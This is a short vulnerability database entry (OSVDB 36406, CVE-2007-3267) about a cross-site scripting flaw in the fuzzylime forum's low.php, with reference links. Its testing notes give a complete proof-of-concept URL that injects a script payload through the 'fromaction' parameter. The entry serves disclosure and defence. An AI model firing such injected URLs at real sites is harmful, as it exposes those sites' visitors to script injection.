fuzzylime (forum) low.php log Action fromaction Variable XSS

2007-06-13T11:48:46
ID OSVDB:36406
Type osvdb
Reporter OSVDB
Modified 2007-06-13T11:48:46

Description

Manual Testing Notes

http://[target]/[path]/low.php?action=log&fromforum=111-222-1933email@address.com&fromtopic=111-222-1933email@address.com&fromaction=>">alert(21407654)%3B

References:

Secunia Advisory ID: 25653
Related OSVDB ID: 1012926
Related OSVDB ID: 36405
Other Advisory URL: http://www.secvsn.com/content/Advisories/sr-180607-fuzzy.html
Other Advisory URL: http://forum.fuzzylime.co.uk/st/content/download/
CVE-2007-3267
Bugtraq ID: 24522